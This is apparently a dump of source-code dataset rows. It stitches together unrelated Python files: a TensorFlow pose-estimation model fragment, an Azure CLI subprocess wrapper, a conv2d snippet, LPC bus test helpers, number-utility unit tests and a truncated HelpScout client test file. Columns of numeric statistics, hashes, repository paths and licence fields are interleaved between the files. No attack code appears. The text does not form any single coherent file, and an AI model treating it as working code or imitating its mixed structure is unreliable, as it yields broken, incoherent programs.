def distributed_fit(self, inputs_imagenet, inputs_place365, inputs_nolbo):
limage, lplace, t1image, t1place, t5image, t5place, lscmse, lshape, pr, rc = self._strategy.run(self.fit, args=(inputs_imagenet, inputs_place365, inputs_nolbo,))
limage = self._strategy.reduce(tf.distribute.ReduceOp.SUM, limage, axis=None)
lplace = self._strategy.reduce(tf.distribute.ReduceOp.SUM, lplace, axis=None)
t1image = self._strategy.reduce(tf.distribute.ReduceOp.SUM, t1image, axis=None)
t1place = self._strategy.reduce(tf.distribute.ReduceOp.SUM, t1place, axis=None)
t5image = self._strategy.reduce(tf.distribute.ReduceOp.SUM, t5image, axis=None)
t5place = self._strategy.reduce(tf.distribute.ReduceOp.SUM, t5place, axis=None)
lscmse = self._strategy.reduce(tf.distribute.ReduceOp.SUM, lscmse, axis=None)
lshape = self._strategy.reduce(tf.distribute.ReduceOp.SUM, lshape, axis=None)
pr = self._strategy.reduce(tf.distribute.ReduceOp.SUM, pr, axis=None)
rc = self._strategy.reduce(tf.distribute.ReduceOp.SUM, rc, axis=None)
return limage, lplace, t1image, t1place, t5image, t5place, lscmse, lshape, pr, rc
def saveEncoderBackbone(self, save_path):
file_name = 'backbone'
self._encoder_backbone.save_weights(os.path.join(save_path, file_name))
def saveEncoderHead(self, save_path):
self._encoder_head_imagenet.save_weights(os.path.join(save_path, 'head_imagenet'))
self._encoder_head_place365.save_weights(os.path.join(save_path, 'head_place365'))
self._encoder_head_nolbo.save_weights(os.path.join(save_path, 'head_nolbo'))
def saveEncoder(self, save_path):
self.saveEncoderBackbone(save_path=save_path)
self.saveEncoderHead(save_path=save_path)
def saveDecoder(self, save_path):
file_name = self._dec_str['name']
self._decoder.save_weights(os.path.join(save_path, file_name))
def savePriornet(self, save_path):
file_name_inst = self._prior_inst_str['name']
file_name_class = self._prior_cl_str['name']
self._priornet_inst.save_weights(os.path.join(save_path, file_name_inst))
self._priornet_cl.save_weights(os.path.join(save_path, file_name_class))
def saveModel(self, save_path):
self.saveEncoder(save_path=save_path)
self.saveDecoder(save_path=save_path)
self.savePriornet(save_path=save_path)
def loadEncoderBackbone(self, load_path, file_name=None):
if file_name == None:
file_name = 'backbone'
self._encoder_backbone.load_weights(os.path.join(load_path, file_name))
def loadEncoderHead(self, load_path):
self._encoder_head_imagenet.load_weights(os.path.join(load_path, 'head_imagenet'))
self._encoder_head_place365.load_weights(os.path.join(load_path, 'head_place365'))
self._encoder_head_nolbo.load_weights(os.path.join(load_path, 'head_nolbo'))
def loadEncoder(self, load_path):
self.loadEncoderBackbone(load_path=load_path)
self.loadEncoderHead(load_path=load_path)
def loadDecoder(self, load_path, file_name=None):
if file_name == None:
file_name = self._dec_str['name']
self._decoder.load_weights(os.path.join(load_path, file_name))
def loadPriornet(self, load_path, file_name=None):
file_name_inst = self._prior_inst_str['name']
file_name_class = self._prior_cl_str['name']
self._priornet_inst.load_weights(os.path.join(load_path, file_name_inst))
self._priornet_cl.load_weights(os.path.join(load_path, file_name_class))
def loadModel(self, load_path):
self.loadEncoder(load_path=load_path)
self.loadDecoder(load_path=load_path)
self.loadPriornet(load_path=load_path)
def _getEV(self, sin, cos, radLogVar):
Esin = tf.exp(-tf.exp(radLogVar) / 2.0) * sin
Ecos = tf.exp(-tf.exp(radLogVar) / 2.0) * cos
Varsin = 0.5 - 0.5 * tf.exp(-2.0 * tf.exp(radLogVar)) * (1.0 - 2.0 * sin * sin) - tf.exp(
-tf.exp(radLogVar)) * sin * sin
Varcos = 0.5 + 0.5 * tf.exp(-2.0 * tf.exp(radLogVar)) * (2.0 * cos * cos - 1.0) - tf.exp(
-tf.exp(radLogVar)) * cos * cos
logVarsin = tf.math.log(Varsin + 1e-7)
logVarcos = tf.math.log(Varcos + 1e-7)
return Esin, Ecos, logVarsin, logVarcos
def _poseLoss(self, sin_gt, cos_gt, rad_var_gt, sin, cos, rad_log_var):
Esin_gt, Ecos_gt, log_var_sin_gt, log_var_cos_gt = self._getEV(
sin=sin_gt, cos=cos_gt, radLogVar=tf.math.log(rad_var_gt+1e-9))
Esin_pr, Ecos_pr, log_var_sin_pr, log_var_cos_pr = self._getEV(
sin=sin, cos=cos, radLogVar=rad_log_var)
loss_sin_kl = kl_loss(mean=Esin_pr, logVar=log_var_sin_pr, mean_target=Esin_gt, logVar_target=log_var_sin_gt)
loss_cos_kl = kl_loss(mean=Ecos_pr, logVar=log_var_cos_pr, mean_target=Ecos_gt, logVar_target=log_var_cos_gt)
sinz = sampling(mu=Esin_pr, logVar=log_var_sin_pr)
cosz = sampling(mu=Ecos_pr, logVar=log_var_cos_pr)
loss_sincos_mse = tf.square(sin_gt - sin)/tf.exp(log_var_sin_gt) \
+ tf.square(cos_gt - cos)/tf.exp(log_var_cos_gt) \
+ tf.square(rad_log_var - tf.math.log(rad_var_gt+1e-9)) \
+ tf.square(sin_gt - sinz) + tf.square(cos_gt - cosz)
# + tf.square(Esin_gt - Esin_pr) + tf.square(Ecos_gt - Ecos_pr) \
# + tf.square(self._ori_sin_gt_tile - self._ori_sin_mean_tile)+ tf.square(self._ori_cos_gt_tile - self._ori_cos_mean_tile) \
# self._loss_sincos_mse = tf.square(self._ori_sin_gt_tile - self._ori_sin_mean_tile) \
# + tf.square(self._ori_cos_gt_tile - self._ori_cos_mean_tile) \
# + tf.square(self._rad_log_var_tile - tf.math.log(self._rad_var+1e-9))
loss_sincos_1 = tf.square(tf.square(sin)+tf.square(cos) - 1.0)
return loss_sin_kl + loss_cos_kl, loss_sincos_mse, loss_sincos_1
| 56.309613
| 190
| 0.631119
| 12,718
| 90,208
| 4.088379
| 0.037899
| 0.027541
| 0.004096
| 0.006193
| 0.923283
| 0.900204
| 0.868432
| 0.838891
| 0.821967
| 0.811389
| 0
| 0.033387
| 0.235655
| 90,208
| 1,601
| 191
| 56.344785
| 0.720725
| 0.155408
| 0
| 0.741409
| 0
| 0
| 0.017131
| 0.00058
| 0
| 0
| 0
| 0
| 0
| 1
| 0.095361
| false
| 0
| 0.005155
| 0.001718
| 0.122852
| 0.006873
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
82e2a834ce1d6730f356acd4dd896f100b74bf59
| 2,565
|
py
|
Python
|
test/pyaz/ams/content_key_policy/option/__init__.py
|
bigdatamoore/py-az-cli
|
54383a4ee7cc77556f6183e74e992eec95b28e01
|
[
"MIT"
] | null | null | null |
test/pyaz/ams/content_key_policy/option/__init__.py
|
bigdatamoore/py-az-cli
|
54383a4ee7cc77556f6183e74e992eec95b28e01
|
[
"MIT"
] | 9
|
2021-09-24T16:37:24.000Z
|
2021-12-24T00:39:19.000Z
|
test/pyaz/ams/content_key_policy/option/__init__.py
|
bigdatamoore/py-az-cli
|
54383a4ee7cc77556f6183e74e992eec95b28e01
|
[
"MIT"
] | null | null | null |
import json, subprocess
from .... pyaz_utils import get_cli_name, get_params
def add(resource_group, account_name, name, policy_option_name, clear_key_configuration=None, open_restriction=None, issuer=None, audience=None, token_key=None, token_key_type=None, alt_symmetric_token_keys=None, alt_rsa_token_keys=None, alt_x509_token_keys=None, token_claims=None, token_type=None, open_id_connect_discovery_document=None, widevine_template=None, ask=None, fair_play_pfx_password=None, fair_play_pfx=None, rental_and_lease_key_type=None, rental_duration=None, play_ready_template=None, fp_playback_duration_seconds=None, fp_storage_duration_seconds=None):
params = get_params(locals())
command = "az ams content-key-policy option add " + params
print(command)
output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout = output.stdout.decode("utf-8")
stderr = output.stderr.decode("utf-8")
if stdout:
return json.loads(stdout)
print(stdout)
else:
raise Exception(stderr)
print(stderr)
def remove(resource_group, account_name, name, policy_option_id):
params = get_params(locals())
command = "az ams content-key-policy option remove " + params
print(command)
output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout = output.stdout.decode("utf-8")
stderr = output.stderr.decode("utf-8")
if stdout:
return json.loads(stdout)
print(stdout)
else:
raise Exception(stderr)
print(stderr)
def update(resource_group, account_name, name, policy_option_id, policy_option_name=None, issuer=None, audience=None, token_key=None, token_key_type=None, add_alt_token_key=None, add_alt_token_key_type=None, token_claims=None, token_type=None, open_id_connect_discovery_document=None, widevine_template=None, ask=None, fair_play_pfx_password=None, fair_play_pfx=None, rental_and_lease_key_type=None, rental_duration=None, play_ready_template=None, fp_playback_duration_seconds=None, fp_storage_duration_seconds=None):
params = get_params(locals())
command = "az ams content-key-policy option update " + params
print(command)
output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout = output.stdout.decode("utf-8")
stderr = output.stderr.decode("utf-8")
if stdout:
return json.loads(stdout)
print(stdout)
else:
raise Exception(stderr)
print(stderr)
| 55.76087
| 573
| 0.749318
| 358
| 2,565
| 5.100559
| 0.215084
| 0.03943
| 0.032859
| 0.032859
| 0.882256
| 0.864732
| 0.864732
| 0.842826
| 0.796824
| 0.796824
| 0
| 0.004125
| 0.149318
| 2,565
| 45
| 574
| 57
| 0.832722
| 0
| 0
| 0.804878
| 0
| 0
| 0.05731
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.073171
| false
| 0.04878
| 0.04878
| 0
| 0.195122
| 0.219512
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7dcf60f808360f183725825d1c8c10205bec1fde
| 627
|
py
|
Python
|
tf/002_conv2d.py
|
deep-learning/facenet
|
e74cf7c2a29477ed76cd34e243f993090c6f6987
|
[
"MIT"
] | null | null | null |
tf/002_conv2d.py
|
deep-learning/facenet
|
e74cf7c2a29477ed76cd34e243f993090c6f6987
|
[
"MIT"
] | null | null | null |
tf/002_conv2d.py
|
deep-learning/facenet
|
e74cf7c2a29477ed76cd34e243f993090c6f6987
|
[
"MIT"
] | 1
|
2021-09-28T09:20:31.000Z
|
2021-09-28T09:20:31.000Z
|
import tensorflow as tf
# todo http://www.cnblogs.com/welhzh/p/6607581.html
sess = tf.InteractiveSession()
input = tf.Variable(tf.random_normal([1,3,3,5]))
filter = tf.Variable(tf.random_normal([1,1,5,1]))
# 1x3x3x1
op = tf.nn.conv2d(input, filter, strides=[1, 1, 1, 1], padding='VALID')
sess.run(tf.global_variables_initializer())
print(sess.run(op).shape)
input = tf.Variable(tf.random_normal([1,3,3,5]))
filter = tf.Variable(tf.random_normal([3,3,5,1]))
op = tf.nn.conv2d(input, filter, strides=[1, 1, 1, 1], padding='VALID')
sess.run(tf.global_variables_initializer())
print(sess.run(op).shape)
print(sess.run(op))
| 26.125
| 71
| 0.711324
| 109
| 627
| 4.018349
| 0.330275
| 0.031963
| 0.109589
| 0.164384
| 0.746575
| 0.746575
| 0.744292
| 0.744292
| 0.744292
| 0.744292
| 0
| 0.064685
| 0.087719
| 627
| 23
| 72
| 27.26087
| 0.701049
| 0.090909
| 0
| 0.615385
| 0
| 0
| 0.017637
| 0
| 0
| 0
| 0
| 0.043478
| 0
| 1
| 0
| false
| 0
| 0.076923
| 0
| 0.076923
| 0.230769
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7dedb0117d1be905df8ae3f0566a0d766c72b378
| 8,641
|
py
|
Python
|
tests/helpers.py
|
mikey/lpcperipheral
|
ef2f91127c14f9f49759f614f512f3b79f659327
|
[
"Apache-2.0"
] | 2
|
2021-10-05T01:23:56.000Z
|
2021-10-05T14:34:51.000Z
|
tests/helpers.py
|
mikey/lpcperipheral
|
ef2f91127c14f9f49759f614f512f3b79f659327
|
[
"Apache-2.0"
] | 1
|
2021-10-10T23:15:11.000Z
|
2021-10-10T23:15:11.000Z
|
tests/helpers.py
|
mikey/lpcperipheral
|
ef2f91127c14f9f49759f614f512f3b79f659327
|
[
"Apache-2.0"
] | 3
|
2021-10-05T01:28:22.000Z
|
2021-10-08T13:45:32.000Z
|
import unittest
START_IO = 0b0000
START_FWRD = 0b1101
START_FWWR = 0b1110
CYCLE_IOWRITE = 0b0010
CYCLE_IOREAD = 0b0000
SYNC_READY = 0b0000
SYNC_SHORT_WAIT = 0b0101
SYNC_LONG_WAIT = 0b0110
class Helpers:
def wishbone_write(self, wb, addr, data, sel=1, delay=1):
yield wb.adr.eq(addr)
yield wb.dat_w.eq(data)
yield wb.we.eq(1)
yield wb.cyc.eq(1)
yield wb.stb.eq(1)
yield wb.sel.eq(sel)
# clock
yield
for i in range(delay):
# clock
yield
self.assertEqual((yield wb.ack), 1)
yield wb.we.eq(0)
yield wb.cyc.eq(0)
yield wb.stb.eq(0)
yield wb.sel.eq(0)
# Shouldn't need to clear dat and adr, so leave them set
def wishbone_read(self, wb, addr, expected, sel=1, delay=1):
yield wb.adr.eq(addr)
yield wb.cyc.eq(1)
yield wb.stb.eq(1)
yield wb.we.eq(0)
yield wb.sel.eq(sel)
# clock
yield
for i in range(delay):
# clock
yield
self.assertEqual((yield wb.ack), 1)
self.assertEqual((yield wb.dat_r), expected)
yield wb.cyc.eq(0)
yield wb.stb.eq(0)
yield wb.sel.eq(0)
# Shouldn't need to clear dat and adr, so leave it
# Partial transaction. Useful to test reset cases
def lpc_io_read_partial(self, lpc, cycles):
# Once driven things should start moving
yield lpc.lframe.eq(0)
yield lpc.lad_in.eq(START_IO)
yield
yield lpc.lframe.eq(1)
yield lpc.lad_in.eq(CYCLE_IOREAD)
for _ in range(cycles):
yield
def lpc_io_write(self, lpc, addr, data):
# Once driven things should start moving
yield lpc.lframe.eq(0)
yield lpc.lad_in.eq(START_IO)
yield
yield lpc.lframe.eq(0)
yield lpc.lad_in.eq(START_IO)
yield
yield lpc.lframe.eq(1)
yield lpc.lad_in.eq(CYCLE_IOWRITE)
yield
# 16 bits of addr, little endian, least significant nibble first
for i in reversed(range(0, 16, 4)):
x = (addr >> i) & 0xf
yield lpc.lad_in.eq(x)
yield
# 8 bits of data, big endian, most significant nibble first
for i in range(0, 8, 4):
x = (data >> i) & 0xf
yield lpc.lad_in.eq(x)
yield
# TAR1 2 cycles
yield lpc.lad_in.eq(0x1) # eyecatcher
yield
self.assertEqual((yield lpc.lad_en), 0)
yield lpc.lad_in.eq(0x2) # eyecatcher
yield
self.assertEqual((yield lpc.lad_en), 0)
# Sync cycles
yield
while (yield lpc.lad_out) == SYNC_LONG_WAIT:
lad = yield lpc.lad_out
# print("Write SYNC wait: LAD:0x%x" % (lad))
self.assertEqual((yield lpc.lad_en), 1)
yield
self.assertEqual((yield lpc.lad_en), 1)
self.assertEqual((yield lpc.lad_out), SYNC_READY)
# TAR2 2 cycles
yield
self.assertEqual((yield lpc.lad_out), 0b1111)
self.assertEqual((yield lpc.lad_en), 1)
yield lpc.lad_in.eq(0xa) # eyecatcher
yield
self.assertEqual((yield lpc.lad_en), 0)
def lpc_io_read(self, lpc, addr, data):
# Once driven things should start moving
yield lpc.lframe.eq(0)
yield lpc.lad_in.eq(START_IO)
yield
yield lpc.lframe.eq(1)
yield lpc.lad_in.eq(CYCLE_IOREAD)
yield
# 16 bits of addr, little endian, least significant nibble first
for i in reversed(range(0, 16, 4)):
x = (addr >> i) & 0xf
yield lpc.lad_in.eq(x)
yield
# TAR1 2 cycles
yield lpc.lad_in.eq(0x1) # eyecatcher
yield
self.assertEqual((yield lpc.lad_en), 0)
yield lpc.lad_in.eq(0x2) # eyecatcher
yield
self.assertEqual((yield lpc.lad_en), 0)
# Sync cycles
yield
while (yield lpc.lad_out) == SYNC_LONG_WAIT:
lad = yield lpc.lad_out
# print("Read SYNC wait: LAD:0x%x" % (lad))
self.assertEqual((yield lpc.lad_en), 1)
yield
self.assertEqual((yield lpc.lad_en), 1)
self.assertEqual((yield lpc.lad_out), SYNC_READY)
# 8 bits of data, big endian, most significant nibble first
for i in range(0, 8, 4):
yield
x = (data >> i) & 0xf
self.assertEqual((yield lpc.lad_out), x)
self.assertEqual((yield lpc.lad_en), 1)
# TAR2 2 cycles
yield
self.assertEqual((yield lpc.lad_en), 1)
self.assertEqual((yield lpc.lad_out), 0b1111)
yield lpc.lad_in.eq(0xa) # eyecatcher
yield
self.assertEqual((yield lpc.lad_en), 0)
def lpc_fw_write(self, lpc, addr, data, size):
assert ((size == 4) | (size == 2) | (size == 1))
# Once driven things should start moving
yield lpc.lframe.eq(0)
yield lpc.lad_in.eq(START_FWWR)
yield
yield lpc.lframe.eq(1)
yield lpc.lad_in.eq(0) # IDSEL
yield
# 28 bits of addr, little endian, least significant nibble first
for i in reversed(range(0, 28, 4)):
x = (addr >> i) & 0xf
yield lpc.lad_in.eq(x)
yield
# msize encoding. size is in byte
if (size == 1):
yield lpc.lad_in.eq(0b0000)
elif (size == 2):
yield lpc.lad_in.eq(0b0001)
elif (size == 4):
yield lpc.lad_in.eq(0b0010)
else:
assert(0)
yield
# 8 bits of data, big endian, most significant nibble first
for i in range(0, size*8, 4):
x = (data >> i) & 0xf
yield lpc.lad_in.eq(x)
yield
# TAR1 2 cycles
yield lpc.lad_in.eq(0x1) # eyecatcher
yield
self.assertEqual((yield lpc.lad_en), 0)
yield lpc.lad_in.eq(0x2) # eyecatcher
yield
self.assertEqual((yield lpc.lad_en), 0)
# Sync cycles
yield
while (yield lpc.lad_out) == SYNC_LONG_WAIT:
lad = yield lpc.lad_out
# print("Write SYNC wait: LAD:0x%x" % (lad))
self.assertEqual((yield lpc.lad_en), 1)
yield
self.assertEqual((yield lpc.lad_en), 1)
self.assertEqual((yield lpc.lad_out), SYNC_READY)
# TAR2 2 cycles
yield
self.assertEqual((yield lpc.lad_en), 1)
self.assertEqual((yield lpc.lad_out), 0b1111)
yield lpc.lad_in.eq(0xa) # eyecatcher
yield
self.assertEqual((yield lpc.lad_en), 0)
def lpc_fw_read(self, lpc, addr, data, size):
assert ((size == 4) | (size == 2) | (size == 1))
# Once driven things should start moving
yield lpc.lframe.eq(0)
yield lpc.lad_in.eq(START_FWRD)
yield
yield lpc.lframe.eq(1)
yield lpc.lad_in.eq(0) # IDSEL
yield
# 28 bits of addr, little endian, least significant nibble first
for i in reversed(range(0, 28, 4)):
x = (addr >> i) & 0xf
yield lpc.lad_in.eq(x)
yield
# msize encoding. size is in byte
if (size == 1):
yield lpc.lad_in.eq(0b0000)
elif (size == 2):
yield lpc.lad_in.eq(0b0001)
elif (size == 4):
yield lpc.lad_in.eq(0b0010)
else:
assert(0)
yield
# TAR1 2 cycles
yield lpc.lad_in.eq(0x1) # eyecatcher
yield
self.assertEqual((yield lpc.lad_en), 0)
yield lpc.lad_in.eq(0x2) # eyecatcher
yield
self.assertEqual((yield lpc.lad_en), 0)
# Sync cycles
yield
while (yield lpc.lad_out) == SYNC_LONG_WAIT:
lad = yield lpc.lad_out
# print("Read SYNC wait: LAD:0x%x" % (lad))
self.assertEqual((yield lpc.lad_en), 1)
yield
self.assertEqual((yield lpc.lad_en), 1)
self.assertEqual((yield lpc.lad_out), SYNC_READY)
# 32 bits of data, big endian, most significant nibble first
for i in range(0, size*8, 4):
yield
x = (data >> i) & 0xf
self.assertEqual((yield lpc.lad_out), x)
self.assertEqual((yield lpc.lad_en), 1)
# TAR2 2 cycles
yield
self.assertEqual((yield lpc.lad_out), 0b1111)
self.assertEqual((yield lpc.lad_en), 1)
yield lpc.lad_in.eq(0xa) # eyecatcher
yield
self.assertEqual((yield lpc.lad_en), 0)
| 29.592466
| 72
| 0.550631
| 1,215
| 8,641
| 3.812346
| 0.098765
| 0.15544
| 0.187608
| 0.178756
| 0.912781
| 0.908895
| 0.908895
| 0.908895
| 0.905225
| 0.905225
| 0
| 0.044276
| 0.343942
| 8,641
| 291
| 73
| 29.694158
| 0.772799
| 0.161208
| 0
| 0.884615
| 0
| 0
| 0
| 0
| 0
| 0
| 0.008339
| 0
| 0.206731
| 1
| 0.033654
| false
| 0
| 0.004808
| 0
| 0.043269
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
81736bc4f859d16bee6a6e3bbf2f625942560a21
| 18
|
py
|
Python
|
contrib/python/parso/py2/tests/normalizer_issue_files/allowed_syntax_python2.py
|
jochenater/catboost
|
de2786fbc633b0d6ea6a23b3862496c6151b95c2
|
[
"Apache-2.0"
] | 6,989
|
2017-07-18T06:23:18.000Z
|
2022-03-31T15:58:36.000Z
|
contrib/python/parso/py2/tests/normalizer_issue_files/allowed_syntax_python2.py
|
jochenater/catboost
|
de2786fbc633b0d6ea6a23b3862496c6151b95c2
|
[
"Apache-2.0"
] | 1,978
|
2017-07-18T09:17:58.000Z
|
2022-03-31T14:28:43.000Z
|
contrib/python/parso/py2/tests/normalizer_issue_files/allowed_syntax_python2.py
|
jochenater/catboost
|
de2786fbc633b0d6ea6a23b3862496c6151b95c2
|
[
"Apache-2.0"
] | 1,228
|
2017-07-18T09:03:13.000Z
|
2022-03-29T05:57:40.000Z
|
's' b''
u's' b'ä'
| 6
| 9
| 0.333333
| 6
| 18
| 1
| 0.666667
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.222222
| 18
| 2
| 10
| 9
| 0.428571
| 0
| 0
| 0
| 0
| 0
| 0.166667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 1
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
81ddae66b5a379a55356e856e919f1d88a55a6c9
| 3,349
|
py
|
Python
|
tests/lib/bes/common/test_number_util.py
|
reconstruir/bes
|
82ff54b2dadcaef6849d7de424787f1dedace85c
|
[
"Apache-2.0"
] | null | null | null |
tests/lib/bes/common/test_number_util.py
|
reconstruir/bes
|
82ff54b2dadcaef6849d7de424787f1dedace85c
|
[
"Apache-2.0"
] | null | null | null |
tests/lib/bes/common/test_number_util.py
|
reconstruir/bes
|
82ff54b2dadcaef6849d7de424787f1dedace85c
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
#-*- coding:utf-8; mode:python; indent-tabs-mode: nil; c-basic-offset: 2; tab-width: 2 -*-
import unittest
from bes.common.number_util import number_util
from bes.system.compat import compat
class Testnumber_util(unittest.TestCase):
def test_int_to_base2(self):
self.assertEqual( '1', number_util.int_to_base2(1) )
self.assertEqual( '10', number_util.int_to_base2(2) )
self.assertEqual( '11', number_util.int_to_base2(3) )
self.assertEqual( '0001', number_util.int_to_base2(1, 4) )
self.assertEqual( '0010', number_util.int_to_base2(2, 4) )
self.assertEqual( '0011', number_util.int_to_base2(3, 4) )
self.assertEqual( '001', number_util.int_to_base2(1, 3) )
self.assertEqual( '010', number_util.int_to_base2(2, 3) )
self.assertEqual( '011', number_util.int_to_base2(3, 3) )
self.assertEqual( '01', number_util.int_to_base2(1, 2) )
self.assertEqual( '10', number_util.int_to_base2(2, 2) )
self.assertEqual( '11', number_util.int_to_base2(3, 2) )
self.assertEqual( '1', number_util.int_to_base2(1, 1) )
self.assertEqual( '10', number_util.int_to_base2(2, 1) )
self.assertEqual( '11', number_util.int_to_base2(3, 1) )
self.assertEqual( '1', number_util.int_to_base2(1, 0) )
self.assertEqual( '10', number_util.int_to_base2(2, 0) )
self.assertEqual( '11', number_util.int_to_base2(3, 0) )
def test_is_int(self):
self.assertEqual( True, number_util.is_int(5) )
self.assertEqual( False, number_util.is_int(5.5) )
self.assertEqual( True, number_util.is_int(-5) )
self.assertEqual( False, number_util.is_int('5') )
self.assertEqual( False, number_util.is_int('5.5') )
self.assertEqual( False, number_util.is_int('-5') )
self.assertEqual( False, number_util.is_int(u'5') )
self.assertEqual( False, number_util.is_int(u'5.5') )
self.assertEqual( False, number_util.is_int(u'-5') )
if compat.IS_PYTHON2:
self.assertEqual( True, number_util.is_int(long(5)) )
self.assertEqual( True, number_util.is_int(long(-5)) )
def test_string_is_int(self):
self.assertEqual( True, number_util.string_is_int(5) )
self.assertEqual( False, number_util.string_is_int(5.5) )
self.assertEqual( True, number_util.string_is_int(-5) )
self.assertEqual( True, number_util.string_is_int('5') )
self.assertEqual( False, number_util.string_is_int('5.5') )
self.assertEqual( True, number_util.string_is_int('-5') )
self.assertEqual( True, number_util.string_is_int(u'5') )
self.assertEqual( False, number_util.string_is_int(u'5.5') )
self.assertEqual( True, number_util.string_is_int(u'-5') )
def test_to_int(self):
self.assertEqual( 5, number_util.to_int(5) )
self.assertEqual( None, number_util.to_int(5.5) )
self.assertEqual( -5, number_util.to_int(-5) )
self.assertEqual( 5, number_util.to_int('5') )
self.assertEqual( None, number_util.to_int('5.5') )
self.assertEqual( -5, number_util.to_int('-5') )
self.assertEqual( 5, number_util.to_int(u'5') )
self.assertEqual( None, number_util.to_int(u'5.5') )
self.assertEqual( -5, number_util.to_int(u'-5') )
if compat.IS_PYTHON2:
self.assertEqual( 5, number_util.to_int(long(5)) )
self.assertEqual( -5, number_util.to_int(long(-5)) )
if __name__ == "__main__":
unittest.main()
| 44.065789
| 90
| 0.697522
| 532
| 3,349
| 4.112782
| 0.114662
| 0.23309
| 0.190128
| 0.1234
| 0.811243
| 0.811243
| 0.743601
| 0.743144
| 0.719378
| 0.496344
| 0
| 0.051453
| 0.14691
| 3,349
| 75
| 91
| 44.653333
| 0.714386
| 0.032547
| 0
| 0.032787
| 0
| 0
| 0.02656
| 0
| 0
| 0
| 0
| 0
| 0.803279
| 1
| 0.065574
| false
| 0
| 0.04918
| 0
| 0.131148
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
81e193d53c57c9ca2f22b2f46dcdbeb71ebfc639
| 40,652
|
py
|
Python
|
tests/helpscout/test_client.py
|
santiher/python-helpscout-v2
|
d1cfba119e0f87da9de9798304e1969a75a48189
|
[
"MIT"
] | 4
|
2019-08-28T11:58:59.000Z
|
2022-03-16T23:39:40.000Z
|
tests/helpscout/test_client.py
|
santiher/python-helpscout-v2
|
d1cfba119e0f87da9de9798304e1969a75a48189
|
[
"MIT"
] | 3
|
2019-08-28T17:34:27.000Z
|
2019-10-15T08:54:34.000Z
|
tests/helpscout/test_client.py
|
santiher/python-helpscout-v2
|
d1cfba119e0f87da9de9798304e1969a75a48189
|
[
"MIT"
] | 3
|
2021-06-10T21:23:12.000Z
|
2021-09-20T22:09:17.000Z
|
from functools import partial
from unittest import main, TestCase
from unittest.mock import call, MagicMock, patch, PropertyMock
from helpscout.client import EmbeddedKey, HelpScout, HelpScoutEndpointRequester
from helpscout.exceptions import (HelpScoutException,
HelpScoutAuthenticationException,
HelpScoutRateLimitExceededException)
class TestClient(TestCase):
app_id = 'app_id'
app_secret = 'app_secret'
url = 'http://helpscout.com/api/'
sleep = True
seconds = 3
def _get_client(
self, app_id=app_id, app_secret=app_secret, url=url, sleep=sleep,
seconds=seconds, token=None):
hs = HelpScout(app_id, app_secret, url, sleep, seconds)
hs.access_token = token
return hs
def test_init(self):
hs = self._get_client()
self.assertEqual(hs.app_id, self.app_id)
self.assertEqual(hs.app_secret, self.app_secret)
self.assertEqual(hs.base_url, self.url)
self.assertEqual(hs.sleep_on_rate_limit_exceeded, self.sleep)
self.assertEqual(hs.rate_limit_sleep, self.seconds)
self.assertEqual(hs.access_token, None)
def test_get_objects_dict_params(self):
endpoint, params = 'users', {'id': '10', 'name': 'Mike'}
hs = self._get_client()
with patch('helpscout.client.HelpScoutObject') as HelpScoutObject, \
patch('helpscout.client.HelpScout.hit_') as hit:
HelpScoutObject.cls.return_value = cls = MagicMock()
hit.return_value = hit_return = 9
hs.get_objects(endpoint, params=params)
HelpScoutObject.cls.assert_called_with(endpoint, endpoint)
hit.assert_called_with(endpoint, 'get', None, params=params)
cls.from_results.assert_called_with(hit_return)
def test_get_objects_str_params(self):
endpoint, params = 'users', 'id=10&name=Mike'
hs = self._get_client()
with patch('helpscout.client.HelpScoutObject') as HelpScoutObject, \
patch('helpscout.client.HelpScout.hit_') as hit:
HelpScoutObject.cls.return_value = cls = MagicMock()
hit.return_value = hit_return = 9
hs.get_objects(endpoint, params=params)
HelpScoutObject.cls.assert_called_with(endpoint, endpoint)
hit.assert_called_with(endpoint, 'get', None, params=params)
cls.from_results.assert_called_with(hit_return)
def test_get_objects_no_params(self):
endpoint, params = 'users', None
hs = self._get_client()
with patch('helpscout.client.HelpScoutObject') as HelpScoutObject, \
patch('helpscout.client.HelpScout.hit_') as hit:
